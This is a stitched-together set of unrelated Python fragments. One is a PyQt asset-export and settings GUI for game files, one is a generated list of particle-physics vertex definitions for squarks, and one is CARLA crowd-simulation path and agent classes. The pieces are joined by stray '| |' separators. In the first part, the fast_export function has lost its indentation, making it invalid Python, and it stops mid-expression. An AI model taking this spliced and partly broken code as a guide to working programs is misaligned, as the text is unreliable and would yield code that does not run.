            widget.statusBar().showMessage(app.translate("FileNotFound",
                                                         "File not found"))
        else:
            widget.statusBar().showMessage(app.translate("CantConvert",
                                                         "Can't convert"))
    elif ext in types_tex:
        # Default textures carry a generic name; use the parent's name instead.
        if file_name == "default.tex":
            name = file_parent.split(".")[0]
        else:
            name = file_name.split(".")[0]
        save_name = QFileDialog.getSaveFileName(
            caption=app.translate("ExportTex", "Export texture"),
            dir = last_dir+"\\"+name, filter = save_filter[1],
            selectedFilter = last_filter[1])
        if save_name[0] == "":
            return
        last_dir = os.path.dirname(save_name[0])
        last_filter[1] = save_name[1]
        res = convert_image(path+cur_file, # cur_hash file_name
                            save_name[0])
        if res == 0:
            widget.statusBar().showMessage(app.translate("Ready", "Ready"))
        elif res == -1:
            widget.statusBar().showMessage(app.translate("FileNotFound",
                                                         "File not found"))
        else:
            widget.statusBar().showMessage(app.translate("CantConvert",
                                                         "Can't convert"))
    elif ext in types_audio:
        name = file_name
        save_name = QFileDialog.getSaveFileName(
            caption=app.translate("ExportAudio", "Export audio"),
            dir = last_dir+"\\"+name)
        if save_name[0] == "":
            return
        last_dir = os.path.dirname(save_name[0])
        res = convert_audio(path+cur_file, save_name[0])
        if res == 0:
            widget.statusBar().showMessage(app.translate("Ready", "Ready"))
        elif res == -1:
            widget.statusBar().showMessage(app.translate("FileNotFound",
                                                         "File not found"))
        else:
            widget.statusBar().showMessage(app.translate("CantConvert",
                                                         "Can't convert"))
    else:
        # Unknown type: raw copy of the underlying .bin file.
        try:
            if not os.path.isfile(path+cur_file):
                widget.statusBar().showMessage(app.translate("FileNotFound",
                                                             "File not found"))
                return
            name = file_name
            save_name = QFileDialog.getSaveFileName(
                caption=app.translate("ExportFile", "Export file"),
                dir = last_dir+"\\"+name)
            if save_name[0] == "":
                return
            last_dir = os.path.dirname(save_name[0])
            shutil.copyfile(path+cur_file, save_name[0])
            widget.statusBar().showMessage(app.translate("Ready", "Ready"))
        # NOTE(review): bare except hides real errors; consider narrowing to OSError.
        except:
            widget.statusBar().showMessage(app.translate("CantConvert",
                                                         "Can't convert"))
# Add export
exportAction = QAction(app.translate("MenuExport", "Export as..."), widget)
exportAction.setStatusTip(app.translate("ExportTip",
                                        "Save file in common formats"))
exportAction.setShortcut("Ctrl+S")
widget.connect(exportAction, SIGNAL("triggered()"), file_export)
file_menu.addAction(exportAction)
def short_path(path, line_len=45):
    """Shorten a backslash-separated path to roughly `line_len` characters.

    Keeps the first and last components, then alternately re-adds components
    from the back and the front while they fit, replacing the omitted middle
    with "...". Falls back to "...\\<last component>" when nothing fits, and
    returns the path unchanged when it is already short enough.
    """
    if len(path) <= line_len:
        return path
    parts = path.split("\\")
    if len(parts) > 3:
        budget = line_len - 3
        used = len(parts[0]) + len(parts[-1]) + 2
        if used < budget:
            kept = [parts[0], parts[-1]]
            gap = 1  # insertion point for the "..." placeholder
            for i in range(len(parts) - 2):
                # Odd steps take from the front, even steps from the back.
                if i % 2:
                    piece = parts[i // 2 + 1]
                else:
                    piece = parts[-2 - i // 2]
                used += len(piece) + 1
                if used >= budget:
                    break
                kept.insert(gap, piece)
                if i & 1:
                    gap += 1
            kept.insert(gap, "...")
            return "\\".join(kept)
    return "...\\" + parts[-1]
class PathButton(QPushButton):
    """Button that displays a filesystem path and opens a picker when clicked.

    The background turns green when the stored path exists, red otherwise.
    """
    def __init__(self, dialog_title="", is_folder=False, filter=""):
        super(PathButton, self).__init__()
        self.path = ""
        self.is_folder = is_folder
        self.dialog_title = dialog_title
        self.filter = filter
        self.clicked.connect(self.changePath)
    def updatePath(self, path):
        """Store `path` (normalised to backslashes) and refresh the button UI."""
        path = path.replace("/", "\\")
        if self.is_folder and len(path) > 0 and path[-1] != "\\":
            path += "\\"
        checker = os.path.isdir if self.is_folder else os.path.isfile
        if checker(path):
            self.setStyleSheet("background: rgb(150, 255, 150)")
        else:
            self.setStyleSheet("background: rgb(255, 150, 150)")
        self.setToolTip(path)
        self.setText(short_path(path))
        self.path = path
    def changePath(self):
        """Open the folder/file picker and adopt the selection, if any."""
        if self.is_folder:
            chosen = QFileDialog.getExistingDirectory(
                caption=self.dialog_title, dir=self.path)
        else:
            chosen = QFileDialog.getOpenFileName(
                caption=self.dialog_title,
                dir=os.path.dirname(self.path),
                filter=self.filter)[0]
        if chosen != "":
            self.updatePath(chosen)
# Settings
settingsWindow = QWidget()
settingsWindow.resize(350,290)
settingsWindow.setWindowTitle(app.translate("SettingsTitle", "Settings"))
# Tab 1: external tool locations and UI language.
settingsTab1 = QWidget()
settingsTab1Layout = QFormLayout(parent=settingsTab1)
settingsLang = QComboBox(parent=settingsTab1)
settingsLang.addItems(langs)
settingsTab1Layout.addRow(app.translate("SettingsLang", "App language"),
                          settingsLang)
settingsBlender = PathButton(
    dialog_title=app.translate("BlenderDialog", "Choose blender.exe"),
    filter="Blender 3D (blender.exe)")
settingsTab1Layout.addRow(app.translate("SettingsBlender", "Blender path"),
                          settingsBlender)
settingsUnpack = PathButton(app.translate("UnpackerDialog",
                                          "Choose Sir Kane's DEMDExtractor"))
settingsTab1Layout.addRow(app.translate("SettingsUnpack", "Archive unpacker"),
                          settingsUnpack)
settingsTex = PathButton(app.translate("TEX2DDSDialog",
                                       "Choose Tex2Dds converter"))
settingsTab1Layout.addRow(app.translate("SettingsTex", "Tex2DDS converter"),
                          settingsTex)
settingsDds = PathButton(app.translate("DDSDialog",
                                       "Choose dds to image converter"))
settingsTab1Layout.addRow(app.translate("SettingsDDS", "DDS image converter"),
                          settingsDds)
# Tab 2: fast-export destination folder and output formats.
settingsTab2 = QWidget()
settingsTab2Layout = QFormLayout(parent=settingsTab2)
settingsPath = PathButton(app.translate("EPathDialog",
                                        "Choose folder for fast export"),
                          True)
settingsTab2Layout.addRow(app.translate("SettingsPath", "Fast export savepath"),
                          settingsPath)
settingsImage = QComboBox(parent=settingsTab2)
settingsImage.addItems(save_ext_tex)
settingsTab2Layout.addRow(app.translate("SettingsImage", "Image format"),
                          settingsImage)
settingsModel = QComboBox(parent=settingsTab2)
settingsModel.addItems(save_ext_3d)
settingsTab2Layout.addRow(app.translate("SettingsModel", "Models format"),
                          settingsModel)
settingsTab = QTabWidget(parent=settingsWindow)
settingsTab.addTab(settingsTab1,
                   app.translate("SettingsTabCommon", "Common"))
settingsTab.addTab(settingsTab2,
                   app.translate("SettingsTabExport", "Fast export"))
def update_settings():
    """Commit the Settings dialog values into module globals, persist, close."""
    global path
    global dds_converter
    global tex_converter
    global unpacker
    global blender
    global epath
    global ext_textures
    global ext_models
    global lang_name
    global last_dir
    blender = settingsBlender.path
    unpacker= settingsUnpack.path
    tex_converter = settingsTex.path
    dds_converter = settingsDds.path
    epath = settingsPath.path
    # Language switches only take effect after a restart; warn the user.
    if lang_name != settingsLang.currentText():
        lang_name = settingsLang.currentText()
        warn = QMessageBox.information(
            None, app.translate("LangChangeTip", "Language change"),
            app.translate("LangChangeText",
                          "Restart app to enable selected language"))
    ext_textures = settingsImage.currentText()
    ext_models = settingsModel.currentText()
    write_config()
    settingsWindow.close()
def prepare_settings():
    """Load the current configuration into the Settings dialog widgets."""
    # Fall back to the first entry when the stored value is unknown.
    if lang_name in langs:
        settingsLang.setCurrentIndex(langs.index(lang_name))
    else:
        settingsLang.setCurrentIndex(0)
    settingsBlender.updatePath(blender)
    settingsUnpack.updatePath(unpacker)
    settingsTex.updatePath(tex_converter)
    settingsDds.updatePath(dds_converter)
    settingsPath.updatePath(epath)
    if ext_textures in save_ext_tex:
        settingsImage.setCurrentIndex(save_ext_tex.index(ext_textures))
    else:
        settingsImage.setCurrentIndex(0)
    if ext_models in save_ext_3d:
        settingsModel.setCurrentIndex(save_ext_3d.index(ext_models))
    else:
        settingsModel.setCurrentIndex(0)
# Save / Cancel button row and the dialog's overall layout.
settingsButtonLayout = QHBoxLayout()
settingsApply = QPushButton(app.translate("Save", "Save"),
                            parent=settingsWindow)
settingsApply.clicked.connect(update_settings)
settingsCancel = QPushButton(app.translate("Cancel", "Cancel"),
                             parent=settingsWindow)
settingsCancel.clicked.connect(settingsWindow.close)
settingsButtonLayout.addWidget(settingsApply)
settingsButtonLayout.addWidget(settingsCancel)
settingsLayout = QVBoxLayout(settingsWindow)
settingsLayout.addWidget(settingsTab, 1)
settingsLayout.addLayout(settingsButtonLayout)
def showSettings(tab=0):
    # Populate widgets from the current config, select the requested tab, show.
    prepare_settings()
    settingsTab.setCurrentIndex(tab)
    settingsWindow.show()
def configure_fast_export():
    """Tell the user fast export is unconfigured and open its settings tab."""
    info = QMessageBox.information(
        None, app.translate("FastExportSettingsTip",
                            "Need configure fast export"),
        app.translate("FastExportSettingsText",
                      "Before using fast export, you need configure output folder and formats first"))
    showSettings(1)
def fast_export():
global file_name
global file_parent
global cur_hash
global cur_file
if file_name == "" or cur_hash == "":
return
if ext_models == "" or ext_textures == "" or epath == "":
configure_fast_export()
return
if not os.path.isdir(epath):
try:
os.mkdir(epath)
except:
configure_fast_export()
return
if not os.path.isdir(epath):
configure_fast_export()
return
j = 1
ext = file_name.split(".")[-1]
if ext in types_3d:
if file_name == "ground.weightedprim":
name = file_parent.split(".")[0]
else:
name = file_name.split(".")[0]
sname = name + "." + ext_models
while os.path.isfile(epath+sname):
sname = name + "_" + str(j) + "." | |
],
color = [ 'Identity(1,2)' ],
lorentz = [ L.SSSS1 ],
couplings = {(0,0):C.GC_411})
# Auto-generated UFO-format vertex definitions (FeynRules export style):
# couplings of the down-type squark states sd3/sd4/sd5 to sleptons, Higgs
# bosons, Goldstones, neutralinos (n1-n4), photons and other squarks.
# NOTE(review): generated code — regenerate from the model source rather
# than editing these entries by hand.
V_519 = Vertex(name = 'V_519',
               particles = [ P.sd3__tilde__, P.sd3, P.sl3__plus__, P.sl3__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_442})
V_520 = Vertex(name = 'V_520',
               particles = [ P.sd3__tilde__, P.sd3, P.sl4__plus__, P.sl4__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_456})
V_521 = Vertex(name = 'V_521',
               particles = [ P.sd3__tilde__, P.sd3, P.sl5__plus__, P.sl5__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_477})
V_522 = Vertex(name = 'V_522',
               particles = [ P.sd3__tilde__, P.sd3, P.sl6__plus__, P.sl6__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_499})
V_523 = Vertex(name = 'V_523',
               particles = [ P.sd1__tilde__, P.sd1, P.sd3__tilde__, P.sd3 ],
               color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_274,(1,0):C.GC_275})
V_524 = Vertex(name = 'V_524',
               particles = [ P.sd2__tilde__, P.sd2, P.sd3__tilde__, P.sd3 ],
               color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_276,(1,0):C.GC_277})
V_525 = Vertex(name = 'V_525',
               particles = [ P.sd3__tilde__, P.sd3__tilde__, P.sd3, P.sd3 ],
               color = [ 'Identity(1,3)*Identity(2,4)', 'Identity(1,4)*Identity(2,3)', 'T(-1,3,1)*T(-1,4,2)', 'T(-1,3,2)*T(-1,4,1)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(1,0):C.GC_278,(0,0):C.GC_278,(3,0):C.GC_279,(2,0):C.GC_279})
V_526 = Vertex(name = 'V_526',
               particles = [ P.n1, P.d, P.sd4__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_293})
V_527 = Vertex(name = 'V_527',
               particles = [ P.n2, P.d, P.sd4__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_294})
V_528 = Vertex(name = 'V_528',
               particles = [ P.n3, P.d, P.sd4__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_295})
V_529 = Vertex(name = 'V_529',
               particles = [ P.n4, P.d, P.sd4__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_296})
V_530 = Vertex(name = 'V_530',
               particles = [ P.a, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.VSS2 ],
               couplings = {(0,0):C.GC_281})
V_531 = Vertex(name = 'V_531',
               particles = [ P.d__tilde__, P.n1, P.sd4 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_50})
V_532 = Vertex(name = 'V_532',
               particles = [ P.d__tilde__, P.n2, P.sd4 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_51})
V_533 = Vertex(name = 'V_533',
               particles = [ P.d__tilde__, P.n3, P.sd4 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_52})
V_534 = Vertex(name = 'V_534',
               particles = [ P.d__tilde__, P.n4, P.sd4 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_53})
V_535 = Vertex(name = 'V_535',
               particles = [ P.sd4__tilde__, P.sd4, P.sv1__tilde__, P.sv1 ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_288})
V_536 = Vertex(name = 'V_536',
               particles = [ P.sd4__tilde__, P.sd4, P.sv2__tilde__, P.sv2 ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_288})
V_537 = Vertex(name = 'V_537',
               particles = [ P.sd4__tilde__, P.sd4, P.sv3__tilde__, P.sv3 ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_288})
V_538 = Vertex(name = 'V_538',
               particles = [ P.a, P.a, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.VVSS1 ],
               couplings = {(0,0):C.GC_282})
V_539 = Vertex(name = 'V_539',
               particles = [ P.h02, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.SSS1 ],
               couplings = {(0,0):C.GC_1855})
V_540 = Vertex(name = 'V_540',
               particles = [ P.h01, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.SSS1 ],
               couplings = {(0,0):C.GC_1854})
V_541 = Vertex(name = 'V_541',
               particles = [ P.h01, P.h01, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_986})
V_542 = Vertex(name = 'V_542',
               particles = [ P.h02, P.h02, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_985})
V_543 = Vertex(name = 'V_543',
               particles = [ P.A0, P.A0, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_1080})
V_544 = Vertex(name = 'V_544',
               particles = [ P.G0, P.G0, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_1079})
V_545 = Vertex(name = 'V_545',
               particles = [ P.G__minus__, P.G__plus__, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_1079})
V_546 = Vertex(name = 'V_546',
               particles = [ P.H__minus__, P.H__plus__, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_1080})
V_547 = Vertex(name = 'V_547',
               particles = [ P.sd4__tilde__, P.sd4, P.sl1__plus__, P.sl1__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_370})
V_548 = Vertex(name = 'V_548',
               particles = [ P.sd4__tilde__, P.sd4, P.sl2__plus__, P.sl2__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_395})
V_549 = Vertex(name = 'V_549',
               particles = [ P.sd4__tilde__, P.sd4, P.sl3__plus__, P.sl3__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_421})
V_550 = Vertex(name = 'V_550',
               particles = [ P.sd4__tilde__, P.sd4, P.sl4__plus__, P.sl4__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_457})
V_551 = Vertex(name = 'V_551',
               particles = [ P.sd4__tilde__, P.sd4, P.sl5__plus__, P.sl5__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_478})
V_552 = Vertex(name = 'V_552',
               particles = [ P.sd4__tilde__, P.sd4, P.sl6__plus__, P.sl6__minus__ ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_500})
V_553 = Vertex(name = 'V_553',
               particles = [ P.sd1__tilde__, P.sd1, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_297,(1,0):C.GC_301})
V_554 = Vertex(name = 'V_554',
               particles = [ P.sd2__tilde__, P.sd2, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_298,(1,0):C.GC_302})
V_555 = Vertex(name = 'V_555',
               particles = [ P.sd3__tilde__, P.sd3, P.sd4__tilde__, P.sd4 ],
               color = [ 'Identity(1,2)*Identity(3,4)', 'T(-1,2,1)*T(-1,4,3)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_299,(1,0):C.GC_303})
V_556 = Vertex(name = 'V_556',
               particles = [ P.sd4__tilde__, P.sd4__tilde__, P.sd4, P.sd4 ],
               color = [ 'Identity(1,3)*Identity(2,4)', 'Identity(1,4)*Identity(2,3)', 'T(-1,3,1)*T(-1,4,2)', 'T(-1,3,2)*T(-1,4,1)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(1,0):C.GC_300,(0,0):C.GC_300,(3,0):C.GC_304,(2,0):C.GC_304})
V_557 = Vertex(name = 'V_557',
               particles = [ P.n1, P.s, P.sd5__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_318})
V_558 = Vertex(name = 'V_558',
               particles = [ P.n2, P.s, P.sd5__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_319})
V_559 = Vertex(name = 'V_559',
               particles = [ P.n3, P.s, P.sd5__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_320})
V_560 = Vertex(name = 'V_560',
               particles = [ P.n4, P.s, P.sd5__tilde__ ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.FFS3 ],
               couplings = {(0,0):C.GC_321})
V_561 = Vertex(name = 'V_561',
               particles = [ P.a, P.sd5__tilde__, P.sd5 ],
               color = [ 'Identity(2,3)' ],
               lorentz = [ L.VSS2 ],
               couplings = {(0,0):C.GC_306})
V_562 = Vertex(name = 'V_562',
               particles = [ P.s__tilde__, P.n1, P.sd5 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_54})
V_563 = Vertex(name = 'V_563',
               particles = [ P.s__tilde__, P.n2, P.sd5 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_55})
V_564 = Vertex(name = 'V_564',
               particles = [ P.s__tilde__, P.n3, P.sd5 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_56})
V_565 = Vertex(name = 'V_565',
               particles = [ P.s__tilde__, P.n4, P.sd5 ],
               color = [ 'Identity(1,3)' ],
               lorentz = [ L.FFS4 ],
               couplings = {(0,0):C.GC_57})
V_566 = Vertex(name = 'V_566',
               particles = [ P.sd5__tilde__, P.sd5, P.sv1__tilde__, P.sv1 ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_313})
V_567 = Vertex(name = 'V_567',
               particles = [ P.sd5__tilde__, P.sd5, P.sv2__tilde__, P.sv2 ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_313})
V_568 = Vertex(name = 'V_568',
               particles = [ P.sd5__tilde__, P.sd5, P.sv3__tilde__, P.sv3 ],
               color = [ 'Identity(1,2)' ],
               lorentz = [ L.SSSS1 ],
               couplings = {(0,0):C.GC_313})
V_569 = Vertex(name = 'V_569',
               particles = [ P.a, P.a, P.sd5__tilde__, P.sd5 ],
               color = [ 'Identity(3,4)' ],
               lorentz = [ L.VVSS1 ],
               couplings = {(0,0):C.GC_307})
V_570 | |
* forward_vec - half_y_len * sideward_vec]
return corners
def get_pedestrian_bounding_box_corners(actor):
    """Return the four 2D corner points of a pedestrian's footprint.

    Corners are produced in the order (-f +s), (+f +s), (+f -s), (-f -s),
    where f is the heading direction and s its 90-degree rotation.
    """
    bbox = actor.bounding_box
    center = carla.Vector2D(bbox.location.x, bbox.location.y) + get_position(actor)
    heading = get_forward_direction(actor).make_unit_vector()
    lateral = heading.rotate(np.deg2rad(90))
    # Pedestrians get a hardcoded 0.5 x 0.5 footprint.
    front = 0.25 * heading
    side = 0.25 * lateral
    return [center - front + side,
            center + front + side,
            center + front - side,
            center - front - side]
def get_lane_constraints(sidewalk, position, forward_vec):
    """Check whether the lane is bounded by sidewalk on the left/right.

    Casts a probe segment of fixed length (1.5 + 2.0 + 0.8 m) perpendicular
    to the heading on each side and intersects it with the sidewalk.
    Returns (left_constrained, right_constrained).
    """
    probe_length = 1.5 + 2.0 + 0.8
    results = []
    for angle in (-90, 90):  # left probe first, then right
        lateral = (forward_vec.rotate(np.deg2rad(angle))).make_unit_vector()
        probe_end = position + probe_length * lateral
        results.append(sidewalk.intersects(carla.Segment2D(position, probe_end)))
    return results[0], results[1]
def is_car(actor):
    """True for vehicle actors with more than two wheels."""
    if not isinstance(actor, carla.Vehicle):
        return False
    return int(actor.attributes['number_of_wheels']) > 2
def is_bike(actor):
    """True for vehicle actors with exactly two wheels."""
    if not isinstance(actor, carla.Vehicle):
        return False
    return int(actor.attributes['number_of_wheels']) == 2
def is_pedestrian(actor):
    """True for walker (pedestrian) actors."""
    return isinstance(actor, carla.Walker)
class SumoNetworkAgentPath:
    """A path for an agent travelling along the SUMO road network.

    Holds route points sampled every `interval` meters and keeps at least
    `min_points` of them ahead of the agent.
    """

    def __init__(self, route_points, min_points, interval):
        self.route_points = route_points
        self.min_points = min_points
        self.interval = interval

    @staticmethod
    def rand_path(sumo_network, min_points, interval, segment_map, rng=random):
        """Sample a random spawn point from `segment_map` and return a random
        path of at least `min_points` points starting there."""
        spawn_point = None
        route_paths = None
        # Re-sample until a spawn point with at least one outgoing route path is found.
        while not spawn_point or len(route_paths) < 1:
            spawn_point = segment_map.rand_point()
            spawn_point = sumo_network.get_nearest_route_point(spawn_point)
            route_paths = sumo_network.get_next_route_paths(spawn_point, min_points - 1, interval)
        return SumoNetworkAgentPath(rng.choice(route_paths), min_points, interval)

    def resize(self, sumo_network, rng=random):
        """Extend the path until it has `min_points` points.

        Returns False when the network offers no continuation (dead end),
        True otherwise.
        """
        while len(self.route_points) < self.min_points:
            next_points = sumo_network.get_next_route_points(self.route_points[-1], self.interval)
            if len(next_points) == 0:
                return False
            self.route_points.append(rng.choice(next_points))
        return True

    def get_min_offset(self, sumo_network, position):
        """Smallest distance from `position` to any point in the first half of
        the path, or None when the path has fewer than two points."""
        min_offset = None
        for i in range(len(self.route_points) // 2):
            route_point = self.route_points[i]
            offset = (position - sumo_network.get_route_point_position(route_point)).length()
            if min_offset is None or offset < min_offset:
                min_offset = offset
        return min_offset

    def cut(self, sumo_network, position):
        """Drop route points already passed by an agent at `position`.

        Points within 1.0 m are considered reached. If no point in the first
        half of the path is within 1.0 m, cut at the closest point instead
        (the agent drifted off the path).
        """
        cut_index = 0
        min_offset = None
        min_offset_index = None
        for i in range(len(self.route_points) // 2):
            route_point = self.route_points[i]
            offset = (position - sumo_network.get_route_point_position(route_point)).length()
            if min_offset is None or offset < min_offset:
                min_offset = offset
                min_offset_index = i
            if offset <= 1.0:
                cut_index = i + 1
        if min_offset is None:
            # Fewer than two route points: nothing to cut (previously this
            # raised TypeError on the None > 1.0 comparison below).
            return
        # Invalid path because too far away.
        if min_offset > 1.0:
            self.route_points = self.route_points[min_offset_index:]
        else:
            self.route_points = self.route_points[cut_index:]

    def get_position(self, sumo_network, index=0):
        """World position of the route point at `index`."""
        return sumo_network.get_route_point_position(self.route_points[index])

    def get_yaw(self, sumo_network, index=0):
        """Heading in degrees from point `index` towards point `index + 1`."""
        pos = sumo_network.get_route_point_position(self.route_points[index])
        next_pos = sumo_network.get_route_point_position(self.route_points[index + 1])
        return np.rad2deg(math.atan2(next_pos.y - pos.y, next_pos.x - pos.x))
class SidewalkAgentPath:
    """A path for a pedestrian walking along (and occasionally crossing) sidewalks.

    `route_orientations[i]` records the walking direction at point i
    (True = forward along the sidewalk, False = backward).
    """

    def __init__(self, route_points, route_orientations, min_points, interval):
        self.min_points = min_points
        self.interval = interval
        self.route_points = route_points
        self.route_orientations = route_orientations

    @staticmethod
    def rand_path(sidewalk, min_points, interval, cross_probability, segment_map, rng=None):
        """Spawn a path at a random sidewalk point with a random orientation."""
        if rng is None:
            rng = random
        spawn_point = sidewalk.get_nearest_route_point(segment_map.rand_point())
        path = SidewalkAgentPath([spawn_point], [rng.choice([True, False])], min_points, interval)
        path.resize(sidewalk, cross_probability)
        return path

    def resize(self, sidewalk, cross_probability, rng=None):
        """Extend the path to `min_points` points, crossing to the adjacent
        sidewalk with probability `cross_probability` at each step."""
        if rng is None:
            rng = random
        while len(self.route_points) < self.min_points:
            if rng.random() <= cross_probability:
                adjacent_route_point = sidewalk.get_adjacent_route_point(self.route_points[-1], 50.0)
                if adjacent_route_point is not None:
                    self.route_points.append(adjacent_route_point)
                    # Pick a fresh random orientation on the new sidewalk.
                    self.route_orientations.append(rng.randint(0, 1) == 1)
                    continue
            if self.route_orientations[-1]:
                self.route_points.append(
                    sidewalk.get_next_route_point(self.route_points[-1], self.interval))
                self.route_orientations.append(True)
            else:
                self.route_points.append(
                    sidewalk.get_previous_route_point(self.route_points[-1], self.interval))
                self.route_orientations.append(False)
        return True

    def cut(self, sidewalk, position):
        """Drop route points (and their orientations) already passed by an
        agent at `position`; see SumoNetworkAgentPath.cut for the policy."""
        cut_index = 0
        min_offset = None
        min_offset_index = None
        for i in range(len(self.route_points) // 2):
            route_point = self.route_points[i]
            offset = (position - sidewalk.get_route_point_position(route_point)).length()
            if min_offset is None or offset < min_offset:
                min_offset = offset
                min_offset_index = i
            if offset <= 1.0:
                cut_index = i + 1
        if min_offset is None:
            # Fewer than two route points: nothing to cut (previously this
            # raised TypeError on the None > 1.0 comparison below).
            return
        # Invalid path because too far away.
        if min_offset > 1.0:
            self.route_points = self.route_points[min_offset_index:]
            self.route_orientations = self.route_orientations[min_offset_index:]
        else:
            self.route_points = self.route_points[cut_index:]
            self.route_orientations = self.route_orientations[cut_index:]

    def get_position(self, sidewalk, index=0):
        """World position of the route point at `index`."""
        return sidewalk.get_route_point_position(self.route_points[index])

    def get_yaw(self, sidewalk, index=0):
        """Heading in degrees from point `index` towards point `index + 1`."""
        pos = sidewalk.get_route_point_position(self.route_points[index])
        next_pos = sidewalk.get_route_point_position(self.route_points[index + 1])
        return np.rad2deg(math.atan2(next_pos.y - pos.y, next_pos.x - pos.x))
class Agent(object):
    """Bookkeeping for a single crowd agent managed by the simulator."""

    def __init__(self, actor, type_tag, path, preferred_speed, steer_angle_range=0.0, rand=0):
        self.actor = actor
        self.type_tag = type_tag
        self.path = path
        self.preferred_speed = preferred_speed
        self.stuck_time = None
        self.control_velocity = carla.Vector2D(0, 0)
        self.steer_angle_range = steer_angle_range
        self.behavior_type = self.rand_agent_behavior_type(rand)

    def rand_agent_behavior_type(self, prob):
        """Map a random draw `prob` to a behavior type.

        The probabilities are currently hard-wired so that every draw in
        [0, 1] selects the Gamma behavior.
        """
        prob_gamma_agent = 1.0
        prob_simplified_gamma_agent = 0.0
        prob_ttc_agent = 0.0
        if prob <= prob_gamma_agent:
            return carla.AgentBehaviorType.Gamma
        if prob <= prob_gamma_agent + prob_simplified_gamma_agent:
            return carla.AgentBehaviorType.SimplifiedGamma
        return -1
class Context(object):
    """Shared simulation context: map data, occupancy maps, CARLA client,
